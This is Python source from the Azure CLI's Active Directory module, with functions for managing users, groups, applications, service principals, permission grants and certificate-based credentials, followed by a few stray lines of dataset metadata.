client = _graph_client_factory(cmd.cli_ctx)
if show_mine:
return list_owned_objects(client.signed_in_user, 'servicePrincipal')
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if spn:
sub_filters.append("servicePrincipalNames/any(c:c eq '{}')".format(spn))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
result = client.service_principals.list(filter=(' and '.join(sub_filters)))
if sub_filters or include_all:
return result
else:
result = list(itertools.islice(result, 101))
if len(result) == 101:
logger.warning("The result is not complete. You can still use '--all' to get all of them with"
" long latency expected, or provide a filter through command arguments")
return result[:100]
def list_owned_objects(client, object_type=None):
result = client.list_owned_objects()
if object_type:
result = [r for r in result if r.object_type and r.object_type.lower() == object_type.lower()]
return result
def list_users(client, upn=None, display_name=None, query_filter=None):
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if upn:
sub_filters.append("userPrincipalName eq '{}'".format(upn))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
return client.list(filter=(' and ').join(sub_filters))
def create_user(client, user_principal_name, display_name, password,
mail_nickname=None, immutable_id=None, force_change_password_next_login=False):
'''
:param mail_nickname: mail alias. default to user principal name
'''
mail_nickname = mail_nickname or user_principal_name.split('@')[0]
param = UserCreateParameters(user_principal_name=user_principal_name, account_enabled=True,
display_name=display_name, mail_nickname=mail_nickname,
immutable_id=immutable_id,
password_profile=PasswordProfile(
password=password,
force_change_password_next_login=force_change_password_next_login))
return client.create(param)
def get_user_member_groups(cmd, upn_or_object_id, security_enabled_only=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if not _is_guid(upn_or_object_id):
upn_or_object_id = graph_client.users.get(upn_or_object_id).object_id
results = list(graph_client.users.get_member_groups(
upn_or_object_id, security_enabled_only=security_enabled_only))
try:
stubs = _get_object_stubs(graph_client, results)
except GraphErrorException:
stubs = []
stubs = {s.object_id: s.display_name for s in stubs}
return [{'objectId': x, 'displayName': stubs.get(x)} for x in results]
def create_group(cmd, display_name, mail_nickname):
graph_client = _graph_client_factory(cmd.cli_ctx)
group = graph_client.groups.create(GroupCreateParameters(display_name=display_name,
mail_nickname=mail_nickname))
# TODO: uncomment once design reviewed with AAD team
# _set_owner(cmd.cli_ctx, graph_client, group.object_id, graph_client.groups.add_owner)
return group
def check_group_membership(cmd, client, group_id, member_object_id): # pylint: disable=unused-argument
return client.is_member_of(CheckGroupMembershipParameters(group_id=group_id,
member_id=member_object_id))
def list_groups(client, display_name=None, query_filter=None):
'''
list groups in the directory
'''
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
return client.list(filter=(' and ').join(sub_filters))
def list_group_owners(cmd, group_id):
client = _graph_client_factory(cmd.cli_ctx).groups
return client.list_owners(_resolve_group(client, group_id))
def add_group_owner(cmd, owner_object_id, group_id):
graph_client = _graph_client_factory(cmd.cli_ctx)
owner_url = _get_owner_url(cmd.cli_ctx, owner_object_id)
return graph_client.groups.add_owner(_resolve_group(graph_client.groups, group_id), owner_url)
def remove_group_owner(cmd, owner_object_id, group_id):
client = _graph_client_factory(cmd.cli_ctx).groups
return client.remove_owner(_resolve_group(client, group_id), owner_object_id)
def _resolve_group(client, identifier):
if not _is_guid(identifier):
res = list(list_groups(client, display_name=identifier))
if not res:
raise CLIError('Group {} is not found in Graph '.format(identifier))
if len(res) != 1:
raise CLIError('More than 1 group objects has the display name of ' + identifier)
identifier = res[0].object_id
return identifier
def create_application(cmd, display_name, homepage=None, identifier_uris=None,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None,
oauth2_allow_implicit_flow=None, required_resource_accesses=None, native_app=None,
credential_description=None):
graph_client = _graph_client_factory(cmd.cli_ctx)
key_creds, password_creds, required_accesses = None, None, None
if native_app:
if identifier_uris:
raise CLIError("'--identifier-uris' is not required for creating a native application")
identifier_uris = ['http://{}'.format(_gen_guid())] # we will create a temporary one and remove it later
else:
if not identifier_uris:
raise CLIError("'--identifier-uris' is required for creating an application")
password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage,
start_date, end_date, credential_description)
if required_resource_accesses:
required_accesses = _build_application_accesses(required_resource_accesses)
app_patch_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
oauth2_allow_implicit_flow=oauth2_allow_implicit_flow,
required_resource_access=required_accesses)
try:
result = graph_client.applications.create(app_patch_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
if native_app:
# AAD graph doesn't have the API to create a native app, aka public client, the recommended hack is
# to create a web app first, then convert to a native one
# pylint: disable=protected-access
if 'public_client' not in ApplicationUpdateParameters._attribute_map:
ApplicationUpdateParameters._attribute_map['public_client'] = {'key': 'publicClient', 'type': 'bool'}
app_patch_param = ApplicationUpdateParameters(identifier_uris=[])
setattr(app_patch_param, 'public_client', True)
graph_client.applications.patch(result.object_id, app_patch_param)
result = graph_client.applications.get(result.object_id)
return result
def list_permissions(cmd, identifier):
# the important and hard part is to tell users which permissions have been granted.
# we will do due diligence to dig out what matters
graph_client = _graph_client_factory(cmd.cli_ctx)
# first get the permission grant history
client_sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
grant_info = graph_client.oauth2.get(
filter="clientId eq '{}'".format(client_sp_object_id)) # pylint: disable=no-member
grant_histories = grant_info.additional_properties['value']
# get original permissions required by the application, we will cross check the history
# and mark out granted ones
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
permissions = application.required_resource_access
for p in permissions:
result = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(p.resource_app_id)))
granted_times = 'N/A'
if result:
granted_times = ', '.join([x['startTime'] for x in grant_histories if
x['resourceId'] == result[0].object_id])
setattr(p, 'grantedTime', granted_times)
return permissions
def add_permission(cmd, identifier, api, api_permissions):
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
existing = application.required_resource_access
resource_accesses = []
for e in api_permissions:
access_id, access_type = e.split('=')
resource_accesses.append(ResourceAccess(id=access_id, type=access_type))
required_resource_access = RequiredResourceAccess(resource_app_id=api,
resource_access=resource_accesses)
existing.append(required_resource_access)
update_parameter = ApplicationUpdateParameters(required_resource_access=existing)
graph_client.applications.patch(application.object_id, update_parameter)
logger.warning('Invoking "az ad app permission grant --id %s --api %s" is needed to make the '
'change effective', identifier, api)
def delete_permission(cmd, identifier, api):
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
existing_accesses = application.required_resource_access
existing_accesses = [e for e in existing_accesses if e.resource_app_id != api]
update_parameter = ApplicationUpdateParameters(required_resource_access=existing_accesses)
return graph_client.applications.patch(application.object_id, update_parameter)
def grant_application(cmd, identifier, api, expires='1', scope='user_impersonation'):
graph_client = _graph_client_factory(cmd.cli_ctx)
# Get the Service Principal ObjectId for the client app
client_sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
# Get the Service Principal ObjectId for associated app
associated_sp_object_id = _resolve_service_principal(graph_client.service_principals, api)
# Build payload
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=1)
if expires.lower() == 'never':
end_date = start_date + relativedelta(years=1000)
else:
try:
end_date = start_date + relativedelta(years=int(expires))
except ValueError:
raise CLIError('usage error: --expires <INT>|never')
payload = {
"odata.type": "Microsoft.DirectoryServices.OAuth2PermissionGrant",
"clientId": client_sp_object_id,
"consentType": "AllPrincipals",
"resourceId": associated_sp_object_id,
"scope": scope,
"startTime": start_date.isoformat(),
"expiryTime": end_date.isoformat()
}
# Grant OAuth2 permissions
response = graph_client.oauth2.grant(payload) # pylint: disable=no-member
return response
def update_application(instance, display_name=None, homepage=None, # pylint: disable=unused-argument
identifier_uris=None, password=None, reply_urls=None, key_value=None,
key_type=None, key_usage=None, start_date=None, end_date=None, available_to_other_tenants=None,
oauth2_allow_implicit_flow=None, required_resource_accesses=None):
from azure.cli.core.commands.arm import make_camel_case, make_snake_case
password_creds, key_creds, required_accesses = None, None, None
if any([password, key_value]):
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
if required_resource_accesses:
required_accesses = _build_application_accesses(required_resource_accesses)
# Workaround until https://github.com/Azure/azure-rest-api-specs/issues/3437 is fixed
def _get_property(name):
try:
return getattr(instance, make_snake_case(name))
except AttributeError:
return instance.additional_properties.get(make_camel_case(name), None)
app_patch_param = ApplicationUpdateParameters(
display_name=display_name or _get_property('display_name'),
homepage=homepage or _get_property('homepage'),
identifier_uris=identifier_uris or _get_property('identifier_uris'),
reply_urls=reply_urls or _get_property('reply_urls'),
key_credentials=key_creds or None,
password_credentials=password_creds or None,
available_to_other_tenants=available_to_other_tenants or _get_property('available_to_other_tenants'),
required_resource_access=required_accesses or _get_property('required_resource_access'),
oauth2_allow_implicit_flow=oauth2_allow_implicit_flow or _get_property('oauth2_allow_implicit_flow'))
return app_patch_param
def patch_application(cmd, identifier, parameters):
graph_client = _graph_client_factory(cmd.cli_ctx)
object_id = _resolve_application(graph_client.applications, identifier)
return graph_client.applications.patch(object_id, parameters)
def _build_application_accesses(required_resource_accesses):
required_accesses = None
for x in required_resource_accesses:
accesses = [ResourceAccess(id=y['id'], type=y['type']) for y in x['resourceAccess']]
if required_accesses is None:
required_accesses = []
required_accesses.append(RequiredResourceAccess(resource_app_id=x['resourceAppId'],
resource_access=accesses))
return required_accesses
def show_application(client, identifier):
object_id = _resolve_application(client, identifier)
return client.get(object_id)
def delete_application(client, identifier):
object_id = _resolve_application(client, identifier)
client.delete(object_id)
def _resolve_application(client, identifier):
result = list(client.list(filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result:
if _is_guid(identifier):
# it is either app id or object id, let us verify
result = list(client.list(filter="appId eq '{}'".format(identifier)))
else:
raise CLIError("Application '{}' doesn't exist".format(identifier))
return result[0].object_id if result else identifier
def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None,
start_date=None, end_date=None, key_description=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
custom_key_id = None
if key_description and password:
custom_key_id = _encode_custom_key_description(key_description)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(_gen_guid()),
value=password, custom_key_identifier=custom_key_id)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, key_id=str(_gen_guid()), value=key_value,
usage=key_usage, type=key_type, custom_key_identifier=custom_key_id)]
return (password_creds, key_creds)
def create_service_principal(cmd, identifier):
return _create_service_principal(cmd.cli_ctx, identifier)
def _create_service_principal(cli_ctx, identifier, resolve_app=True):
client = _graph_client_factory(cli_ctx)
app_id = identifier
if resolve_app:
if _is_guid(identifier):
result = list(client.applications.list(filter="appId eq '{}'".format(identifier)))
else:
result = list(client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
try:
if not result: # assume we get an object id
result = [client.applications.get(identifier)]
app_id = result[0].app_id
except GraphErrorException:
pass # fallback to appid (maybe from an external tenant?)
return client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def delete_service_principal(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx)
sp_object_id = _resolve_service_principal(client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(client, sp_object_id)
assignments = list_role_assignments(cmd, assignee=identifier, show_all=True)
if assignments:
logger.warning('Removing role assignments')
delete_role_assignments(cmd, [a['id'] for a in assignments])
if app_object_id: # delete the application, and AAD service will automatically clean up the SP
client.applications.delete(app_object_id)
else:
client.service_principals.delete(sp_object_id)
def _get_app_object_id_from_sp_object_id(client, sp_object_id):
sp = client.service_principals.get(sp_object_id)
app_object_id = None
if sp.service_principal_names:
result = list(client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(sp.service_principal_names[0])))
if result:
app_object_id = result[0].object_id
return app_object_id
def list_service_principal_owners(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx)
sp_object_id = _resolve_service_principal(client.service_principals, identifier)
return client.service_principals.list_owners(sp_object_id)
def list_service_principal_credentials(cmd, identifier, cert=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if " sp " in cmd.name:
sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(graph_client, sp_object_id)
else:
app_object_id = _resolve_application(graph_client.applications, identifier)
return _get_service_principal_credentials(graph_client, app_object_id, cert)
def _get_service_principal_credentials(graph_client, app_object_id, cert=False):
if cert:
app_creds = list(graph_client.applications.list_key_credentials(app_object_id))
else:
app_creds = list(graph_client.applications.list_password_credentials(app_object_id))
return app_creds
def delete_service_principal_credential(cmd, identifier, key_id, cert=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if " sp " in cmd.name:
sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(graph_client, sp_object_id)
else:
app_object_id = _resolve_application(graph_client.applications, identifier)
result = _get_service_principal_credentials(graph_client, app_object_id, cert)
to_delete = next((x for x in result if x.key_id == key_id), None)
if to_delete:
result.remove(to_delete)
if cert:
return graph_client.applications.update_key_credentials(app_object_id, result)
return graph_client.applications.update_password_credentials(app_object_id, result)
else:
raise CLIError("'{}' doesn't exist in the service principal of '{}' or associated application".format(
key_id, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
if _is_guid(identifier):
return identifier # assume an object id
else:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def _process_service_principal_creds(cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault):
if not any((cert, create_cert, password, keyvault)):
# 1 - Simplest scenario. Use random password
return str(_gen_guid()), None, None, None, None
if password:
# 2 - Password supplied -- no certs
return password, None, None, None, None
# The rest of the scenarios involve certificates
public_cert_string = None
cert_file = None
if cert and not keyvault:
# 3 - User-supplied public cert data
logger.debug("normalizing x509 certificate with fingerprint %s", cert.digest("sha1"))
cert_start_date = dateutil.parser.parse(cert.get_notBefore().decode())
cert_end_date = dateutil.parser.parse(cert.get_notAfter().decode())
public_cert_string = _get_public(cert)
elif create_cert and not keyvault:
# 4 - Create local self-signed cert
public_cert_string, cert_file, cert_start_date, cert_end_date = \
_create_self_signed_cert(app_start_date, app_end_date)
elif create_cert and keyvault:
# 5 - Create self-signed cert in KeyVault
public_cert_string, cert_file, cert_start_date, cert_end_date = \
_create_self_signed_cert_with_keyvault(cli_ctx, years, keyvault, cert)
elif keyvault:
# 6 - Use existing cert from KeyVault
kv_client = _get_keyvault_client(cli_ctx)
vault_base = 'https://{}{}/'.format(keyvault, cli_ctx.cloud.suffixes.keyvault_dns)
cert_obj = kv_client.get_certificate(vault_base, cert, '')
public_cert_string = base64.b64encode(cert_obj.cer).decode('utf-8') # pylint: disable=no-member
cert_start_date = cert_obj.attributes.not_before # pylint: disable=no-member
cert_end_date = cert_obj.attributes.expires # pylint: disable=no-member
return (password, public_cert_string, cert_file, cert_start_date, cert_end_date)
def _validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date):
if not cert_start_date and not cert_end_date:
return app_start_date, app_end_date, None, None
if cert_start_date > app_start_date:
logger.warning('Certificate is not valid until %s. Adjusting SP start date to match.',
cert_start_date)
app_start_date = cert_start_date + datetime.timedelta(seconds=1)
if cert_end_date < app_end_date:
logger.warning('Certificate expires %s. Adjusting SP end date to match.',
cert_end_date)
app_end_date = cert_end_date - datetime.timedelta(seconds=1)
return (app_start_date, app_end_date, cert_start_date, cert_end_date)
# pylint: disable=inconsistent-return-statements
def create_service_principal_for_rbac(
# pylint:disable=too-many-statements,too-many-locals, too-many-branches
cmd, name=None, password=None, years=None, create_cert=False, cert=None, scopes=None, role='Contributor',
show_auth_for_sdk=None, skip_assignment=False, keyvault=None):
import time
graph_client = _graph_client_factory(cmd.cli_ctx)
role_client = _auth_client_factory(cmd.cli_ctx).role_assignments
scopes = scopes or ['/subscriptions/' + role_client.config.subscription_id]
years = years or 1
sp_oid = None
_RETRY_TIMES = 36
app_display_name = None
if name and '://' not in name:
prefix = "http://"
app_display_name = name
logger.warning('Changing "%s" to a valid URI of "%s%s", which is the required format'
' used for service principal names', name, prefix, name)
name = prefix + name # normalize to be a valid graph service principal name
if name:
query_exp = 'servicePrincipalNames/any(x:x eq \'{}\')'.format(name)
aad_sps = list(graph_client.service_principals.list(filter=query_exp))
if aad_sps:
raise CLIError("'{}' already exists.".format(name))
app_display_name = name.split('://')[-1]
app_start_date = datetime.datetime.now(TZ_UTC)
app_end_date = app_start_date + relativedelta(years=years or 1)
app_display_name = app_display_name or ('azure-cli-' +
app_start_date.strftime('%Y-%m-%d-%H-%M-%S'))
if name is None:
name = 'http://' + app_display_name # just a valid uri, no need to exist
password, public_cert_string, cert_file, cert_start_date, cert_end_date = \
_process_service_principal_creds(cmd.cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault)
app_start_date, app_end_date, cert_start_date, cert_end_date = \
_validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date)
aad_application = create_application(cmd,
display_name=app_display_name,
homepage='https://' + app_display_name,
identifier_uris=[name],
available_to_other_tenants=False,
password=password,
key_value=public_cert_string,
start_date=app_start_date,
end_date=app_end_date,
credential_description='rbac')
# pylint: disable=no-member
app_id = aad_application.app_id
# retry till server replication is done
for l in range(0, _RETRY_TIMES):
try:
aad_sp = _create_service_principal(cmd.cli_ctx, app_id, resolve_app=False)
break
except Exception as ex: # pylint: disable=broad-except
if l < _RETRY_TIMES and (
' does not reference ' in str(ex) or ' does not exist ' in str(ex)):
time.sleep(5)
logger.warning('Retrying service principal creation: %s/%s', l + 1, _RETRY_TIMES)
else:
logger.warning(
"Creating service principal failed for appid '%s'. Trace followed:\n%s",
name, ex.response.headers if hasattr(ex,
'response') else ex) # pylint: disable=no-member
raise
sp_oid = aad_sp.object_id
# TODO: uncomment once design reviewed with AAD team
# _set_owner(cmd.cli_ctx, graph_client, aad_application.object_id, graph_client.applications.add_owner)
    # retry until server replication completes
if not skip_assignment:
for scope in scopes:
for l in range(0, _RETRY_TIMES):
try:
_create_role_assignment(cmd.cli_ctx, role, sp_oid, None, scope, resolve_assignee=False)
break
except Exception as ex:
if l < _RETRY_TIMES and ' does not exist in the directory ' in str(ex):
time.sleep(5)
logger.warning('Retrying role assignment creation: %s/%s', l + 1,
_RETRY_TIMES)
continue
else:
# dump out history for diagnoses
logger.warning('Role assignment creation failed.\n')
if getattr(ex, 'response', None) is not None:
logger.warning('role assignment response headers: %s\n',
ex.response.headers) # pylint: disable=no-member
raise
if show_auth_for_sdk:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cmd.cli_ctx)
result = profile.get_sp_auth_info(scopes[0].split('/')[2] if scopes else None,
app_id, password, cert_file)
# sdk-auth file should be in json format all the time, hence the print
print(json.dumps(result, indent=2))
return
result = {
'appId': app_id,
'password': password,
'name': name,
'displayName': app_display_name,
'tenant': graph_client.config.tenant_id
}
if cert_file:
        logger.warning(
            "Please copy %s to a safe place. When running 'az login', provide the file path to the --password argument",
            cert_file)
result['fileWithCertAndPrivateKey'] = cert_file
return result
def _get_signed_in_user_object_id(graph_client):
try:
return graph_client.signed_in_user.get().object_id
except GraphErrorException: # error could be possible if you logged in as a service principal
pass
def _get_keyvault_client(cli_ctx):
from azure.cli.core._profile import Profile
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def _get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
return KeyVaultClient(KeyVaultAuthentication(_get_token), api_version=version)
def _create_self_signed_cert(start_date, end_date): # pylint: disable=too-many-locals
from os import path
import tempfile
from OpenSSL import crypto
from datetime import timedelta
_, cert_file = tempfile.mkstemp()
_, key_file = tempfile.mkstemp()
    # create a file with both cert & key so users can use it to log in
    # leverage tempfile to produce a random file name
_, temp_file = tempfile.mkstemp()
creds_file = path.join(path.expanduser("~"), path.basename(temp_file) + '.pem')
# create a key pair
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 2048)
# create a self-signed cert
cert = crypto.X509()
subject = cert.get_subject()
    # as long as it works, we skip fields C, ST, L, O, OU, for which we have no reasonable defaults
subject.CN = 'CLI-Login'
cert.set_serial_number(1000)
asn1_format = '%Y%m%d%H%M%SZ'
cert_start_date = start_date - timedelta(seconds=1)
cert_end_date = end_date + timedelta(seconds=1)
cert.set_notBefore(cert_start_date.strftime(asn1_format).encode('utf-8'))
cert.set_notAfter(cert_end_date.strftime(asn1_format).encode('utf-8'))
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, 'sha1')
with open(cert_file, "wt") as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode())
with open(key_file, "wt") as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode())
cert_string = None
with open(creds_file, 'wt') as cf:
with open(key_file, 'rt') as f:
cf.write(f.read())
with open(cert_file, "rt") as f:
cert_string = f.read()
cf.write(cert_string)
# get rid of the header and tails for upload to AAD: ----BEGIN CERT....----
cert_string = re.sub(r'\-+[A-z\s]+\-+', '', cert_string).strip()
return (cert_string, creds_file, cert_start_date, cert_end_date)
def _create_self_signed_cert_with_keyvault(cli_ctx, years, keyvault, keyvault_cert_name): # pylint: disable=too-many-locals
import time
kv_client = _get_keyvault_client(cli_ctx)
cert_policy = {
'issuer_parameters': {
'name': 'Self'
},
'key_properties': {
'exportable': True,
'key_size': 2048,
'key_type': 'RSA',
'reuse_key': True
},
'lifetime_actions': [{
'action': {
'action_type': 'AutoRenew'
},
'trigger': {
'days_before_expiry': 90
}
}],
'secret_properties': {
'content_type': 'application/x-pkcs12'
},
'x509_certificate_properties': {
'key_usage': [
'cRLSign',
'dataEncipherment',
'digitalSignature',
'keyEncipherment',
'keyAgreement',
'keyCertSign'
],
'subject': 'CN=KeyVault Generated',
'validity_in_months': ((years * 12) + 1)
}
}
vault_base_url = 'https://{}{}/'.format(keyvault, cli_ctx.cloud.suffixes.keyvault_dns)
kv_client.create_certificate(vault_base_url, keyvault_cert_name, cert_policy)
while kv_client.get_certificate_operation(vault_base_url, keyvault_cert_name).status != 'completed': # pylint: disable=no-member, line-too-long
time.sleep(5)
cert = kv_client.get_certificate(vault_base_url, keyvault_cert_name, '')
cert_string = base64.b64encode(cert.cer).decode('utf-8') # pylint: disable=no-member
cert_start_date = cert.attributes.not_before # pylint: disable=no-member
cert_end_date = cert.attributes.expires # pylint: disable=no-member
creds_file = None
return (cert_string, creds_file, cert_start_date, cert_end_date)
def _try_x509_pem(cert):
import OpenSSL.crypto
try:
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
except OpenSSL.crypto.Error:
# could not load the pem, try with headers
try:
pem_with_headers = '-----BEGIN CERTIFICATE-----\n' \
+ cert + \
'-----END CERTIFICATE-----\n'
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem_with_headers)
except OpenSSL.crypto.Error:
return None
except UnicodeEncodeError:
# this must be a binary encoding
return None
def _try_x509_der(cert):
import OpenSSL.crypto
try:
cert = base64.b64decode(cert)
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, cert)
except OpenSSL.crypto.Error:
return None
def _get_public(x509):
import OpenSSL.crypto
pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, x509)
if isinstance(pem, bytes):
pem = pem.decode("utf-8")
stripped = pem.replace('-----BEGIN CERTIFICATE-----\n', '')
stripped = stripped.replace('-----END CERTIFICATE-----\n', '')
return stripped
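# Hedged sketch (hypothetical helper, shown only for illustration): the three
# helpers above are typically combined to normalize user-supplied certificate
# material into the bare base64 body expected by AAD, trying PEM (with or
# without headers) first and falling back to DER:
#
#     def _normalize_cert_input(cert):
#         x509 = _try_x509_pem(cert) or _try_x509_der(cert)
#         if x509 is None:
#             raise CLIError('Invalid certificate')
#         return _get_public(x509)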
def reset_service_principal_credential(cmd, name, password=None, create_cert=False, cert=None, years=None,
keyvault=None, append=False, credential_description=None):
client = _graph_client_factory(cmd.cli_ctx)
# pylint: disable=no-member
years = years or 1
# look for the existing application
query_exp = "servicePrincipalNames/any(x:x eq \'{0}\') or displayName eq '{0}'".format(name)
aad_sps = list(client.service_principals.list(filter=query_exp))
if not aad_sps:
raise CLIError("can't find a service principal matching '{}'".format(name))
if len(aad_sps) > 1:
raise CLIError(
'more than one entry matches the name, please provide unique names like '
'app id guid, or app id uri')
app = show_application(client.applications, aad_sps[0].app_id)
app_start_date = datetime.datetime.now(TZ_UTC)
app_end_date = app_start_date + relativedelta(years=years or 1)
# build a new password/cert credential and patch it
public_cert_string = None
cert_file = None
password, public_cert_string, cert_file, cert_start_date, cert_end_date = \
_process_service_principal_creds(cmd.cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault)
app_start_date, app_end_date, cert_start_date, cert_end_date = \
_validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date)
app_creds = None
cert_creds = None
custom_key_identifier = None
if credential_description and password:
custom_key_identifier = _encode_custom_key_description(credential_description)
if password:
app_creds = []
if append:
app_creds = list(client.applications.list_password_credentials(app.object_id))
app_creds.append(PasswordCredential(
start_date=app_start_date,
end_date=app_end_date,
key_id=str(_gen_guid()),
value=password,
custom_key_identifier=custom_key_identifier
))
if public_cert_string:
cert_creds = []
if append:
cert_creds = list(client.applications.list_key_credentials(app.object_id))
cert_creds.append(KeyCredential(
start_date=app_start_date,
end_date=app_end_date,
value=public_cert_string,
key_id=str(_gen_guid()),
usage='Verify',
type='AsymmetricX509Cert',
custom_key_identifier=custom_key_identifier
))
app_create_param = ApplicationUpdateParameters(password_credentials=app_creds, key_credentials=cert_creds)
client.applications.patch(app.object_id, app_create_param)
result = {
'appId': app.app_id,
'password': password,
'name': name,
'tenant': client.config.tenant_id
}
if cert_file:
result['fileWithCertAndPrivateKey'] = cert_file
return result
def _encode_custom_key_description(key_description):
# utf16 is used by AAD portal. Do not change it to other random encoding
# unless you know what you are doing.
return key_description.encode('utf-16')
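# For example (illustrative): _encode_custom_key_description('rbac') is simply
# 'rbac'.encode('utf-16'), i.e. UTF-16 bytes prefixed with a byte-order mark,
# which is the form used for the credential's custom_key_identifier above.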
def _resolve_object_id(cli_ctx, assignee, fallback_to_object_id=False):
client = _graph_client_factory(cli_ctx)
result = None
try:
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
except (CloudError, GraphErrorException):
if fallback_to_object_id and _is_guid(assignee):
return assignee
raise
def _is_guid(guid):
try:
uuid.UUID(guid)
return True
except ValueError:
pass
return False
def _get_object_stubs(graph_client, assignees):
from azure.graphrbac.models import GetObjectsParameters
result = []
assignees = list(assignees) # callers could pass in a set
for i in range(0, len(assignees), 1000):
params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees[i:i + 1000])
result += list(graph_client.objects.get_objects_by_object_ids(params))
return result
def _get_owner_url(cli_ctx, owner_object_id):
if '://' in owner_object_id:
return owner_object_id
graph_url = cli_ctx.cloud.endpoints.active_directory_graph_resource_id
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
_, _2, tenant_id = profile.get_login_credentials()
return graph_url + tenant_id + '/directoryObjects/' + owner_object_id
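# Illustrative note: for the public Azure cloud the graph resource id is typically
# 'https://graph.windows.net/', so the returned owner URL has the shape
# 'https://graph.windows.net/<tenant-guid>/directoryObjects/<owner-object-guid>'
# (both GUIDs are placeholders here).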
def _set_owner(cli_ctx, graph_client, asset_object_id, setter):
signed_in_user_object_id = _get_signed_in_user_object_id(graph_client)
if signed_in_user_object_id:
setter(asset_object_id, _get_owner_url(cli_ctx, signed_in_user_object_id))
# for injecting test seams to produce predictable role assignment ids for playback
def _gen_guid():
return uuid.uuid4()
| 43.910714
| 162
| 0.663715
|
814b9c9d4c1029229b3f42bda4ae24ae473abb9c
| 525
|
py
|
Python
|
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | 1
|
2022-02-13T20:57:15.000Z
|
2022-02-13T20:57:15.000Z
|
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
